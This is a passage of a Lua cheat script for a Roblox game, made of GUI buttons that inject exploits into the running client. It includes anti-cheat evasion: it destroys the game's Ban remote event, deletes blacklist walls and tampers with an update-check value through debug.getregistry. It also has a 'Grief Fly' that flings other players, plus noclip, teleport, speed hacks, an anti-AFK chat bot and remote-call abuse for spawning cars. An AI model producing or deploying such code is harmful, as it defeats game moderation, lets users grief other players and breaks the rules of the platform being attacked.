  3434. local Humanoid = game:GetService("Players").LocalPlayer.Character.Humanoid;
  3435. Humanoid:GetPropertyChangedSignal("WalkSpeed"):Connect(function()
  3436. Humanoid.WalkSpeed = _G.WS;
  3437. end)
  3438. Humanoid.WalkSpeed = _G.WS;
  3439.  
  3440. walkspeedenabled = false
  3441. end
  3442. end
  3443. end
  3444.  
  3445. walkspeedmouse.KeyDown:connect(x_walkspeed)
  3446.  
  3447. end)
  3448.  
  3449. AntiBlack.Name = "AntiBlackLabel"
  3450. AntiBlack.Parent = toolaFrame
  3451. AntiBlack.BackgroundColor3 = Color3.new(0, 0, 0)
  3452. AntiBlack.BorderColor3 = Color3.new(0, 0, 0)
  3453. AntiBlack.Position = UDim2.new(0, 3, 0, 49)
  3454. AntiBlack.Size = UDim2.new(0, 165, 0, 20)
  3455. AntiBlack.Font = Enum.Font.Fantasy
  3456. AntiBlack.FontSize = Enum.FontSize.Size18
  3457. AntiBlack.Text = "Anti Black List (OFF)"
  3458. AntiBlack.TextColor3 = Color3.new(255, 0, 0)
  3459. AntiBlack.TextSize = 15
  3460. AntiBlack.MouseButton1Click:connect(function()
  3461. makesound("rbxassetid://156785206")
  3462. AntiBlack.TextColor3 = Color3.new(0, 1, 0)
  3463. AntiBlack.BackgroundColor3 = Color3.new(0, 0, 0)
  3464. AntiBlack.Text = "Anti Black List (ON)"
  3465. local plr = game.Players.LocalPlayer
  3466. local cframe
  3467. for i,v in next, workspace:GetDescendants() do
  3468. if v:IsA("SpawnLocation") then
  3469. v.Touched:Connect(function(h)
  3470. if h.Parent == plr.Character and cframe then
  3471. plr.Character:SetPrimaryPartCFrame(cframe)
  3472. end
  3473. end)
  3474. end
  3475. end
  3476.  
  3477. game:GetService("RunService"):BindToRenderStep("NO HACKS",Enum.RenderPriority.Last.Value,function()
  3478. if game.Players.LocalPlayer.Character.PrimaryPart then
  3479. cframe = game.Players.LocalPlayer.Character.PrimaryPart.CFrame
  3480. end
  3481. end)
  3482.  
  3483. for i,v in next, debug.getregistry() do
  3484. if type(v)=='function' and debug.getupvalues(v).lastUpdate then
  3485. debug.setupvalue(v,"lastUpdate",math.huge)
  3486. break
  3487. end
  3488. end
  3489.  
  3490. for i,v in next, workspace.Effects:GetChildren() do
  3491. if v:IsA("BasePart") and v.Name == "BlacklistWall" then
  3492. v:Destroy()
  3493. end
  3494. end
  3495. end)
  3496.  
  3497. GriefFly.Name = "GriefFly"
  3498. GriefFly.Parent = toolaFrame
  3499. GriefFly.BackgroundColor3 = Color3.new(0, 0, 0)
  3500. GriefFly.BorderColor3 = Color3.new(0, 0, 0)
  3501. GriefFly.Position = UDim2.new(0, 3, 0, 72)
  3502. GriefFly.Size = UDim2.new(0, 110, 0, 20)
  3503. GriefFly.Font = Enum.Font.Fantasy
  3504. GriefFly.FontSize = Enum.FontSize.Size18
  3505. GriefFly.Text = "Grief Fly Off "
  3506. GriefFly.TextColor3 = Color3.new(255, 0, 0)
  3507. GriefFly.TextSize = 15
  3508. GriefFly.MouseButton1Click:connect(function()
  3509. GriefFly.Text = "Grief Fly On "
  3510. GriefFly.TextColor3 = Color3.new(0, 1, 0)
  3511. StopGriefFly.Text = "Stop Fly"
  3512. Speed = 2
  3513. Force = 800000
  3514.  
  3515. --Script:
  3516. lplayer = game:GetService("Players").LocalPlayer
  3517. Mouse = lplayer:GetMouse()
  3518. speedfly = Speed
  3519. T = lplayer.Character.HumanoidRootPart
  3520. CONTROL = {F = 0, B = 0, L = 0, R = 0}
  3521. lCONTROL = {F = 0, B = 0, L = 0, R = 0}
  3522.  
  3523. local function fly()
  3524. flying = true
  3525. local BG = Instance.new('BodyGyro', T)
  3526. local BV = Instance.new('BodyVelocity', T)
  3527. BG.P = 9e4
  3528. BG.maxTorque = Vector3.new(9e9, 9e9, 9e9)
  3529. BG.cframe = T.CFrame
  3530. BV.velocity = Vector3.new(0, 0.1, 0)
  3531. BV.maxForce = Vector3.new(9e9, 9e9, 9e9)
  3532. spawn(function()
  3533. repeat wait()
  3534. lplayer.Character.Humanoid.PlatformStand = true
  3535. if CONTROL.L + CONTROL.R ~= 0 or CONTROL.F + CONTROL.B ~= 0 then
  3536. SPEED = 50
  3537. elseif not (CONTROL.L + CONTROL.R ~= 0 or CONTROL.F + CONTROL.B ~= 0) and SPEED ~= 0 then
  3538. SPEED = 0
  3539. end
  3540. if (CONTROL.L + CONTROL.R) ~= 0 or (CONTROL.F + CONTROL.B) ~= 0 then
  3541. BV.velocity = ((workspace.CurrentCamera.CoordinateFrame.lookVector * (CONTROL.F + CONTROL.B)) + ((workspace.CurrentCamera.CoordinateFrame * CFrame.new(CONTROL.L + CONTROL.R, (CONTROL.F + CONTROL.B) * 0.2, 0).p) - workspace.CurrentCamera.CoordinateFrame.p)) * SPEED
  3542. lCONTROL = {F = CONTROL.F, B = CONTROL.B, L = CONTROL.L, R = CONTROL.R}
  3543. elseif (CONTROL.L + CONTROL.R) == 0 and (CONTROL.F + CONTROL.B) == 0 and SPEED ~= 0 then
  3544. BV.velocity = ((workspace.CurrentCamera.CoordinateFrame.lookVector * (lCONTROL.F + lCONTROL.B)) + ((workspace.CurrentCamera.CoordinateFrame * CFrame.new(lCONTROL.L + lCONTROL.R, (lCONTROL.F + lCONTROL.B) * 0.2, 0).p) - workspace.CurrentCamera.CoordinateFrame.p)) * SPEED
  3545. else
  3546. BV.velocity = Vector3.new(0, 0.1, 0)
  3547. end
  3548. BG.cframe = workspace.CurrentCamera.CoordinateFrame
  3549. until not flying
  3550. CONTROL = {F = 0, B = 0, L = 0, R = 0}
  3551. lCONTROL = {F = 0, B = 0, L = 0, R = 0}
  3552. SPEED = 0
  3553. BG:destroy()
  3554. BV:destroy()
  3555. lplayer.Character.Humanoid.PlatformStand = false
  3556. end)
  3557. end
  3558. Mouse.KeyDown:connect(function(KEY)
  3559. if KEY:lower() == 'w' then
  3560. CONTROL.F = speedfly
  3561. elseif KEY:lower() == 's' then
  3562. CONTROL.B = -speedfly
  3563. elseif KEY:lower() == 'a' then
  3564. CONTROL.L = -speedfly
  3565. elseif KEY:lower() == 'd' then
  3566. CONTROL.R = speedfly
  3567. end
  3568. end)
  3569. Mouse.KeyUp:connect(function(KEY)
  3570. if KEY:lower() == 'w' then
  3571. CONTROL.F = 0
  3572. elseif KEY:lower() == 's' then
  3573. CONTROL.B = 0
  3574. elseif KEY:lower() == 'a' then
  3575. CONTROL.L = 0
  3576. elseif KEY:lower() == 'd' then
  3577. CONTROL.R = 0
  3578. end
  3579. end)
  3580. fly()
  3581.  
  3582.  
  3583. -- Made by JackMcJagger15
  3584.  
  3585. power = Force -- change this to make it more or less powerful
  3586.  
  3587. game:GetService('RunService').Stepped:connect(function()
  3588. game.Players.LocalPlayer.Character.Head.CanCollide = false
  3589. game.Players.LocalPlayer.Character.Torso.CanCollide = false
  3590. game.Players.LocalPlayer.Character["Left Leg"].CanCollide = false
  3591. game.Players.LocalPlayer.Character["Right Leg"].CanCollide = false
  3592. end)
  3593.  
  3594. wait(.1)
  3595. local bambam = Instance.new("BodyThrust")
  3596. bambam.Parent = game.Players.LocalPlayer.Character.HumanoidRootPart
  3597. bambam.Force = Vector3.new(power,0,power)
  3598. bambam.Location = game.Players.LocalPlayer.Character.HumanoidRootPart.Position
  3599.  
  3600. while wait(0.2) do
  3601. game.Players.LocalPlayer.Character:WaitForChild("Humanoid").Died:connect(function()
  3602. script:Remove()
  3603. end)
  3604. end
  3605. end)
  3606.  
  3607. StopGriefFly.Name = "StopGriefFly"
  3608. StopGriefFly.Parent = toolaFrame
  3609. StopGriefFly.BackgroundColor3 = Color3.new(0, 0, 0)
  3610. StopGriefFly.BorderColor3 = Color3.new(0, 0, 0)
  3611. StopGriefFly.Position = UDim2.new(0, 117, 0, 72)
  3612. StopGriefFly.Size = UDim2.new(0, 51, 0, 20)
  3613. StopGriefFly.Font = Enum.Font.Fantasy
  3614. StopGriefFly.FontSize = Enum.FontSize.Size18
  3615. StopGriefFly.Text = "Stop Fly"
  3616. StopGriefFly.TextColor3 = Color3.new(255, 0, 0)
  3617. StopGriefFly.TextSize = 15
  3618. StopGriefFly.MouseButton1Click:connect(function()
  3619. GriefFly.TextColor3 = Color3.new(1, 1, 1)
  3620. active = false
  3621. game.Players.LocalPlayer.Character.HumanoidRootPart.BodyThrust:Remove()
  3622. if flying then
  3623. end
  3624. GriefFly.Text = "Grief Fly Off "
  3625. StopGriefFly.Text = "Press Fly"
  3626. GriefFly.TextColor3 = Color3.new(255, 0, 0)
  3627. end)
  3628.  
  3629. Fly.Name = "Fly"
  3630. Fly.Parent = toolaFrame
  3631. Fly.BackgroundColor3 = Color3.new(0, 0, 0)
  3632. Fly.BorderColor3 = Color3.new(0, 0, 0)
  3633. Fly.Position = UDim2.new(0, 3, 0, 95)
  3634. Fly.Size = UDim2.new(0, 165, 0, 20)
  3635. Fly.Font = Enum.Font.Fantasy
  3636. Fly.FontSize = Enum.FontSize.Size18
  3637. Fly.Text = "Fly (Press again to STOP)"
  3638. Fly.TextColor3 = Color3.new(255, 0, 0)
  3639. Fly.TextSize = 15
  3640. Fly.MouseButton1Down:connect(function()
  3641. makesound("rbxassetid://156785206")
  3642.  
  3643. flying = not flying
  3644. repeat wait()
  3645. until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:findFirstChild("Torso") and game.Players.LocalPlayer.Character:findFirstChild("Humanoid")
  3646. local mouse = game.Players.LocalPlayer:GetMouse()
  3647. repeat wait() until mouse
  3648. local plr = game.Players.LocalPlayer
  3649. local torso = plr.Character.Torso
  3650. local deb = true
  3651. local ctrl = {f = 0, b = 0, l = 0, r = 0}
  3652. local lastctrl = {f = 0, b = 0, l = 0, r = 0}
  3653. local maxspeed = 200
  3654. local speed = 0
  3655. if flying then
  3656. end
  3657.  
  3658. function FlyFunction()
  3659. local bg = Instance.new("BodyGyro", torso)
  3660. bg.P = 9e4
  3661. bg.maxTorque = Vector3.new(9e9, 9e9, 9e9)
  3662. bg.cframe = torso.CFrame
  3663. local bv = Instance.new("BodyVelocity", torso)
  3664. bv.velocity = Vector3.new(0,0.1,0)
  3665. bv.maxForce = Vector3.new(9e9, 9e9, 9e9)
  3666. repeat wait()
  3667. plr.Character.Humanoid.PlatformStand = true
  3668. if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then
  3669. speed = speed+.5+(speed/maxspeed)
  3670. if speed > maxspeed then
  3671. speed = maxspeed
  3672. end
  3673. elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then
  3674. speed = speed-1
  3675. if speed < 0 then
  3676. speed = 0
  3677. end
  3678. end
  3679. if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then
  3680. bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (ctrl.f+ctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
  3681. lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r}
  3682. elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then
  3683. bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (lastctrl.f+lastctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
  3684. else
  3685. bv.velocity = Vector3.new(0,0.1,0)
  3686. end
  3687. bg.cframe = game.Workspace.CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0)
  3688. until not flying
  3689. ctrl = {f = 0, b = 0, l = 0, r = 0}
  3690. lastctrl = {f = 0, b = 0, l = 0, r = 0}
  3691. speed = 0
  3692. bg:Destroy()
  3693. bv:Destroy()
  3694. plr.Character.Humanoid.PlatformStand = false
  3695. end
  3696. mouse.KeyDown:connect(function(key)
  3697. if key:lower() == "w" then
  3698. ctrl.f = 1
  3699. elseif key:lower() == "s" then
  3700. ctrl.b = -1
  3701. elseif key:lower() == "a" then
  3702. ctrl.l = -1
  3703. elseif key:lower() == "d" then
  3704. ctrl.r = 1
  3705.  
  3706. end
  3707. end)
  3708. mouse.KeyUp:connect(function(key)
  3709. if key:lower() == "w" then
  3710. ctrl.f = 0
  3711. elseif key:lower() == "s" then
  3712. ctrl.b = 0
  3713. elseif key:lower() == "a" then
  3714. ctrl.l = 0
  3715. elseif key:lower() == "d" then
  3716. ctrl.r = 0
  3717. end
  3718. end)
  3719. FlyFunction()
  3720.  
  3721. end)
  3722.  
  3723. PinkWires.Name = "PinkWires"
  3724. PinkWires.Parent = toolaFrame
  3725. PinkWires.BackgroundColor3 = Color3.new(0, 0, 0)
  3726. PinkWires.BorderColor3 = Color3.new(0, 0, 0)
  3727. PinkWires.Position = UDim2.new(0, 3, 0, 118)
  3728. PinkWires.Size = UDim2.new(0, 165, 0, 20)
  3729. PinkWires.Font = Enum.Font.Fantasy
  3730. PinkWires.FontSize = Enum.FontSize.Size18
  3731. PinkWires.Text = "Pink Wires"
  3732. PinkWires.TextColor3 = Color3.new(255, 0, 0)
  3733. PinkWires.TextSize = 15
  3734. PinkWires.MouseButton1Click:connect(function()
  3735. makesound("rbxassetid://156785206")
  3736. local typecurrent = false
  3737. if typecurrent == true then
  3738. typecurrent = false
  3739. PinkWires.TextColor3 = Color3.new(0.666667, 0, 0)
  3740. PinkWires.Text = "Pink Wires: Magenta Icicle"
  3741. local c = game.ReplicatedStorage.Purchasables:FindFirstChild("IcicleWireMagenta", true)
  3742. c.Name = "Wire"
  3743. local d = game.ReplicatedStorage.Purchasables:FindFirstChild("Wire", true)
  3744. d:Destroy()
  3745. elseif typecurrent == false then
  3746. typecurrent = true
  3747. PinkWires.TextColor3 = Color3.new(0, 1,0)
  3748. PinkWires.Text = "Pink Wires: Active"
  3749. local a = game.ReplicatedStorage.Purchasables:FindFirstChild("NeonWirePinky", true)
  3750. a.Name = "Wire"
  3751. local b = game.ReplicatedStorage.Purchasables:FindFirstChild("Wire", true)
  3752. b:Destroy()
  3753. end
  3754. end)
  3755.  
  3756. WaterCollide.Name = "WaterCollide"
  3757. WaterCollide.Parent = toolaFrame
  3758. WaterCollide.BackgroundColor3 = Color3.new(0, 0, 0)
  3759. WaterCollide.BorderColor3 = Color3.new(0, 0, 0)
  3760. WaterCollide.Position = UDim2.new(0, 3, 0, 141)
  3761. WaterCollide.Size = UDim2.new(0, 165, 0, 20)
  3762. WaterCollide.Font = Enum.Font.Fantasy
  3763. WaterCollide.FontSize = Enum.FontSize.Size18
  3764. WaterCollide.Text = "Walk On Water"
  3765. WaterCollide.TextColor3 = Color3.new(255, 0, 0)
  3766. WaterCollide.TextSize = 15
  3767. WaterCollide.MouseButton1Down:connect(function()
  3768. makesound("rbxassetid://156785206")
  3769. if WCollide == "Nothing" then
  3770. WCollide = "On"
  3771. WaterCollide.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  3772. WaterCollide.TextColor3 = Color3.new(0, 1, 0)
  3773. WaterCollide.Text = "Water Is Solid"
  3774. game:service'ReplicatedStorage'.Interaction.Ban:Destroy()
  3775. Instance.new('RemoteEvent', game:service'ReplicatedStorage'.Interaction).Name = "Ban"
  3776. for i,v in pairs(game.Workspace.Water:GetChildren()) do
  3777. if v:IsA("Part") then
  3778. v.CanCollide = true
  3779. end
  3780. end
  3781. else
  3782. WCollide = "Nothing"
  3783. WaterCollide.BackgroundColor3 = Color3.new(0, 0, 0)
  3784. WaterCollide.TextColor3 = Color3.new(255, 0, 0)
  3785. WaterCollide.Text = "Walk On Water"
  3786. for i,v in pairs(game.Workspace.Water:GetChildren()) do
  3787. if v:IsA("Part") then
  3788. v.CanCollide = false
  3789. end
  3790. end
  3791. end
  3792. end)
  3793.  
  3794.  
  3795. ClickTP.Name = "ClickTP"
  3796. ClickTP.Parent = toolaFrame
  3797. ClickTP.BackgroundColor3 = Color3.new(0, 0, 0)
  3798. ClickTP.BorderColor3 = Color3.new(0, 0, 0)
  3799. ClickTP.Position = UDim2.new(0, 3, 0, 164)
  3800. ClickTP.Size = UDim2.new(0, 165, 0, 20)
  3801. ClickTP.Font = Enum.Font.Fantasy
  3802. ClickTP.FontSize = Enum.FontSize.Size18
  3803. ClickTP.Text = "ClickTP"
  3804. ClickTP.TextColor3 = Color3.new(255, 0, 0)
  3805. ClickTP.TextSize = 15
  3806. ClickTP.MouseButton1Click:Connect(function()
  3807. makesound("rbxassetid://156785206")
  3808. mouse = game.Players.LocalPlayer:GetMouse()
  3809. tool = Instance.new("Tool")
  3810. tool.RequiresHandle = false
  3811. tool.Name = "Click Teleport"
  3812. tool.Activated:connect(function()
  3813. local pos = mouse.Hit+Vector3.new(0,2.5,0)
  3814. pos = CFrame.new(pos.X,pos.Y,pos.Z)
  3815. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = pos
  3816. end)
  3817. tool.Parent = game.Players.LocalPlayer.Backpack
  3818. end)
  3819.  
  3820. Noclip.Name = "Noclip"
  3821. Noclip.Parent = toolaFrame
  3822. Noclip.BackgroundColor3 = Color3.new(0, 0, 0)
  3823. Noclip.BorderColor3 = Color3.new(0, 0, 0)
  3824. Noclip.Position = UDim2.new(0, 3, 0, 187)
  3825. Noclip.Size = UDim2.new(0, 165, 0, 20)
  3826. Noclip.Font = Enum.Font.Fantasy
  3827. Noclip.FontSize = Enum.FontSize.Size18
  3828. Noclip.Text = "No clip"
  3829. Noclip.TextColor3 = Color3.new(255, 0, 0)
  3830. Noclip.TextSize = 15
  3831. noclip = false
  3832. game:GetService('RunService').Stepped:connect(function()
  3833. if noclip then
  3834. game.Players.LocalPlayer.Character.Humanoid:ChangeState(11)
  3835. Noclip.BackgroundColor3 = Color3.new(0, 0, 0)
  3836. Noclip.TextColor3 = Color3.new(0, 1, 0)
  3837. Noclip.Text = "No Clip On"
  3838. end
  3839. end)
  3840. Noclip.MouseButton1Down:connect(function()
  3841. makesound("rbxassetid://156785206")
  3842. noclip = not noclip
  3843. Noclip.BackgroundColor3 = Color3.new(0, 0, 0)
  3844. Noclip.TextColor3 = Color3.new(255, 0, 0)
  3845. Noclip.Text = "No Clip Off"
  3846.  
  3847. end)
  3848. AntiAFKtime.Name = "AntiAFKtime"
  3849. AntiAFKtime.Parent = toolaFrame
  3850. AntiAFKtime.BackgroundColor3 = Color3.new(0, 0, 0)
  3851. AntiAFKtime.BorderColor3 = Color3.new(0, 0, 0)
  3852. AntiAFKtime.Position = UDim2.new(0, 3, 0, 210)
  3853. AntiAFKtime.Size = UDim2.new(0, 165, 0, 20)
  3854. AntiAFKtime.Font = Enum.Font.Fantasy
  3855. AntiAFKtime.FontSize = Enum.FontSize.Size18
  3856. AntiAFKtime.Text = "AFK for: 0 Seconds"
  3857. AntiAFKtime.TextColor3 = Color3.new(255, 0, 0)
  3858. AntiAFKtime.TextSize = 15
  3859.  
  3860.  
  3861. AntiAFK.Name = "AntiAFK"
  3862. AntiAFK.Parent = toolaFrame
  3863. AntiAFK.BackgroundColor3 = Color3.new(0, 0, 0)
  3864. AntiAFK.BorderColor3 = Color3.new(0, 0, 0)
  3865. AntiAFK.Position = UDim2.new(0, 3, 0, 233)
  3866. AntiAFK.Size = UDim2.new(0, 165, 0, 20)
  3867. AntiAFK.Font = Enum.Font.Fantasy
  3868. AntiAFK.FontSize = Enum.FontSize.Size18
  3869. AntiAFK.Text = "Start Anti-AFK Mode"
  3870. AntiAFK.TextColor3 = Color3.new(255, 0, 0)
  3871. AntiAFK.TextSize = 15
  3872. AntiAFK.MouseButton1Down:Connect(function()
  3873. makesound("rbxassetid://156785206")
  3874. if afkactive == true then
  3875. afkactive = false
  3876. AntiAFK.BackgroundColor3 = Color3.new(0, 0, 0)
  3877. AntiAFKtime.TextColor3 = Color3.new(0, 1, 0)
  3878. AntiAFK.Text = "Start Anti-AFK Mode"
  3879. elseif afkactive == false then
  3880. afkactive = true
  3881. AntiAFK.BackgroundColor3 = Color3.new(0, 0, 0)
  3882. AntiAFKtime.TextColor3 = Color3.new(1, 1, 1)
  3883. AntiAFK.Text = "Stop Anti-AFK Mode"
  3884.  
  3885. logtime = coroutine.wrap(function()
  3886. afktotaltime=0
  3887. while afkactive == true do
  3888. wait(1)
  3889. afktotaltime=afktotaltime+1
  3890. AntiAFKtime.Text = "AFK for: "..afktotaltime.." Seconds"
  3891. end
  3892. end)
  3893.  
  3894. messageBot = coroutine.wrap(function()
  3895. while afkactive == true do
  3896. wait(900)
  3897. possiblechats = {"afk", "brb", "I'm AFK"}
  3898. decide=math.random(1,#possiblechats)
  3899. game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer(possiblechats[decide], "All")
  3900. game.Players:Chat("/e point")
  3901. end
  3902. end)
  3903.  
  3904. moveChar = coroutine.wrap(function()
  3905. plr = game:service'Players'.LocalPlayer
  3906. char = plr.Character
  3907. hum = char:FindFirstChildOfClass'Humanoid'
  3908. while afkactive==true do
  3909. wait(1)
  3910. hum:Move(Vector3.new(1, 0, 0), false)
  3911. wait(1)
  3912. hum:Move(Vector3.new(-1, 0, 0), false)
  3913. wait(1)
  3914. hum:Move(Vector3.new(1, 0, 0), false)
  3915. wait(1)
  3916. hum:Move(Vector3.new(-1, 0, 0), false)
  3917. wait(1)
  3918. hum:Move(Vector3.new(0, 1, 0), false)
  3919. wait(1)
  3920. hum:Move(Vector3.new(0, 1, 0), false)
  3921. wait(60)
  3922. end
  3923. end)
  3924.  
  3925. logtime()
  3926. moveChar()
  3927. messageBot()
  3928.  
  3929. end
  3930. end)
  3931.  
  3932.  
  3933. Fog.Name = "Fog"
  3934. Fog.Parent = toolaFrame
  3935. Fog.BackgroundColor3 = Color3.new(0, 0, 0)
  3936. Fog.BorderColor3 = Color3.new(0, 0, 0)
  3937. Fog.Position = UDim2.new(0, 3, 0, 256)
  3938. Fog.Size = UDim2.new(0, 165, 0, 20)
  3939. Fog.Font = Enum.Font.Fantasy
  3940. Fog.FontSize = Enum.FontSize.Size18
  3941. Fog.Text = "Remove Fog"
  3942. Fog.TextColor3 = Color3.new(255, 0, 0)
  3943. Fog.TextSize = 15
  3944. Fog.MouseButton1Down:connect(function()
  3945. makesound("rbxassetid://156785206")
  3946. Fog.BackgroundColor3 = Color3.new(0, 0, 0)
  3947. Fog.TextColor3 = Color3.new(0, 1, 0)
  3948. game.Lighting.Changed:connect(function()
  3949. game.Lighting.TimeOfDay = "12:00:00"
  3950. game.Lighting.FogEnd = 9999
  3951. game.Lighting.Brightness = 2
  3952. end)
  3953. end)
  3954.  
  3955. CARAs.Name = "CARAs"
  3956. CARAs.Parent = toolaFrame
  3957. CARAs.BackgroundColor3 = Color3.new(0, 0, 0)
  3958. CARAs.BorderColor3 = Color3.new(0, 0, 0)
  3959. CARAs.Position = UDim2.new(0, 147, 0, 279)
  3960. CARAs.Size = UDim2.new(0, 21, 0, 20)
  3961. CARAs.Font = Enum.Font.Fantasy
  3962. CARAs.FontSize = Enum.FontSize.Size18
  3963. CARAs.Text = "S"
  3964. CARAs.TextColor3 = Color3.new(255, 0, 0)
  3965. CARAs.TextSize = 15
  3966.  
  3967. CARA.Name = "CARA"
  3968. CARA.Parent = toolaFrame
  3969. CARA.BackgroundColor3 = Color3.new(0, 0, 0)
  3970. CARA.BorderColor3 = Color3.new(0, 0, 0)
  3971. CARA.Position = UDim2.new(0, 3, 0, 279)
  3972. CARA.Size = UDim2.new(0, 140, 0, 20)
  3973. CARA.Font = Enum.Font.Fantasy
  3974. CARA.FontSize = Enum.FontSize.Size18
  3975. CARA.Text = "Fast Car"
  3976. CARA.TextColor3 = Color3.new(255, 0, 0)
  3977. CARA.TextSize = 15
  3978. CARA.MouseButton1Down:connect(function()
  3979. makesound("rbxassetid://156785206")
  3980. CARA.BackgroundColor3 = Color3.new(0, 0, 0)
  3981. CARA.TextColor3 = Color3.new(0, 1, 0)
  3982. game.Workspace.PlayerModels.ChildAdded:connect(function(ADDED)
  3983. wait(0.5)
  3984. if ADDED:FindFirstChild('Configuration') then
  3985. if ADDED.Configuration:FindFirstChild('MaxSpeed') then
  3986. ADDED.Configuration.MaxSpeed.Value = CARAs.Text
  3987. end
  3988. end
  3989. end)
  3990. end)
  3991.  
  3992. PinkCar = Instance.new("TextButton")
  3993. TpCar = Instance.new("TextButton")
  3994. PinkCars = Instance.new("TextButton")
  3995.  
  3996. PinkCar.Name = "PinkCar"
  3997. PinkCar.Parent = toolaFrame
  3998. PinkCar.BackgroundColor3 = Color3.new(0, 0, 0)
  3999. PinkCar.BorderColor3 = Color3.new(0, 0, 0)
  4000. PinkCar.Position = UDim2.new(0, 3, 0, 302)
  4001. PinkCar.Size = UDim2.new(0, 140, 0, 20)
  4002. PinkCar.Font = Enum.Font.Fantasy
  4003. PinkCar.FontSize = Enum.FontSize.Size18
  4004. PinkCar.Text = "Pink Car Spawner"
  4005. PinkCar.TextColor3 = Color3.new(255, 0, 0)
  4006. PinkCar.TextSize = 15
  4007.  
  4008. PinkCars.Name = "PinkCars"
  4009. PinkCars.Parent = toolaFrame
  4010. PinkCars.BackgroundColor3 = Color3.new(0, 0, 0)
  4011. PinkCars.BorderColor3 = Color3.new(0, 0, 0)
  4012. PinkCars.Position = UDim2.new(0, 147, 0, 302)
  4013. PinkCars.Size = UDim2.new(0, 21, 0, 20)
  4014. PinkCars.Font = Enum.Font.Fantasy
  4015. PinkCars.FontSize = Enum.FontSize.Size18
  4016. PinkCars.Text = "C"
  4017. PinkCars.TextColor3 = Color3.new(255, 0, 0)
  4018. PinkCars.TextSize = 15
  4019.  
  4020. PinkCar.MouseButton1Click:connect(function()
  4021. PinkCars.TextColor3 = Color3.new(0, 1, 0)
  4022. PinkCar.TextColor3 = Color3.new(0, 1, 0)
  4023. if _G.Executed == false or _G.Executed == nil then
  4024. _G.Executed = true
  4025. Spawned = false
  4026. Spawning = false
  4027. SpawnPad = nil
  4028. workspace.PlayerModels.ChildAdded:connect(function(Added)
  4029. if Spawned == false and Spawning == false then
  4030. Owner = nil
  4031. CheckTries = 0
  4032. CheckSuccess = false
  4033. repeat
  4034. wait()
  4035. CheckTries = CheckTries + 1
  4036. if Added:FindFirstChild("Owner") and Added:FindFirstChild("Type") and Added.Type.Value == "Vehicle" and Added:FindFirstChild("Settings") and Added.Settings:FindFirstChild("Color") then
  4037. CheckSuccess = true
  4038. Owner = Added.Owner.Value
  4039. end
  4040. until CheckTries == 75 or CheckSuccess == true
  4041. if Owner == game.Players.LocalPlayer or game.ReplicatedStorage.Interaction.ClientIsWhitelisted:InvokeServer(Owner) == true then
  4042. Spawning = true
  4043. Added:WaitForChild("Settings")
  4044. Added.Settings:WaitForChild("Color")
  4045. if tostring(Added.Settings.Color.Value) == tostring(1032) then
  4046. Spawned = true
  4047. Spawning = false
  4048. print(Spawned)
  4049. elseif tostring(Added.Settings.Color.Value) ~= tostring(1032) then
  4050. if SpawnPad:FindFirstChild("ButtonRemote_SpawnButton") and SpawnPad:FindFirstChild("Owner") then
  4051. if SpawnPad.Owner.Value == game.Players.LocalPlayer or game.ReplicatedStorage.Interaction.ClientIsWhitelisted:InvokeServer(SpawnPad.Owner.Value) == true then
  4052. Spawning = false
  4053. game.ReplicatedStorage.Interaction.RemoteProxy:FireServer(SpawnPad.ButtonRemote_SpawnButton)
  4054. end
  4055. end
  4056. end
  4057. end
  4058. end
  4059. end)
  4060.  
  4061. mouse = game.Players.LocalPlayer:GetMouse()
  4062. mouse.KeyDown:connect(function(key)
  4063. if key:lower() == "c" then
  4064. if mouse.Target.Parent:FindFirstChild("ButtonRemote_SpawnButton") then
  4065. SpawnPad = mouse.Target.Parent
  4066. Spawned = false
  4067. Spawning = false
  4068. game.ReplicatedStorage.Interaction.RemoteProxy:FireServer(mouse.Target.Parent.ButtonRemote_SpawnButton)
  4069. else
  4070. Spawned = true
  4071. Spawning = false
  4072. end
  4073. end
  4074. end)
  4075. end
  4076. spawn(function()
  4077. repeat
  4078. wait()
  4079. if Spawned == true then
  4080. Spawned = false
  4081. game:GetService("StarterGui"):SetCore("SendNotification", {
  4082. Title = "Pink Car",
  4083. Text = "Successful Spawned."
  4084. })
  4085. end
  4086. until Spawned == true
  4087. end)
  4088. end)
  4089.  
  4090. TpCar.Name = "TpCar"
  4091. TpCar.Parent = toolaFrame
  4092. TpCar.BackgroundColor3 = Color3.new(0, 0, 0)
  4093. TpCar.BorderColor3 = Color3.new(0, 0, 0)
  4094. TpCar.Position = UDim2.new(0, 3, 0, 325)
  4095. TpCar.Size = UDim2.new(0, 165, 0, 20)
  4096. TpCar.Font = Enum.Font.Fantasy
  4097. TpCar.FontSize = Enum.FontSize.Size18
  4098. TpCar.Text = "TP Cars"
  4099. TpCar.TextColor3 = Color3.new(255, 0, 0)
  4100. TpCar.TextSize = 15
  4101.  
  4102. TpCarFrame.Name = "TpCarFrame"
  4103. TpCarFrame.Parent = MenuFrame
  4104. TpCarFrame.BorderSizePixel = 1
  4105. TpCarFrame.BackgroundTransparency = 0
  4106. TpCarFrame.BorderColor3 = Color3.new(0, 0, 0)
  4107. TpCarFrame.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  4108. TpCarFrame.Size = UDim2.new(0, 170, 0, 327)
  4109. TpCarFrame.Visible = false
  4110.  
  4111. SpawnPointa.Name = "SpawnPointa"
  4112. SpawnPointa.Parent = TpCarFrame
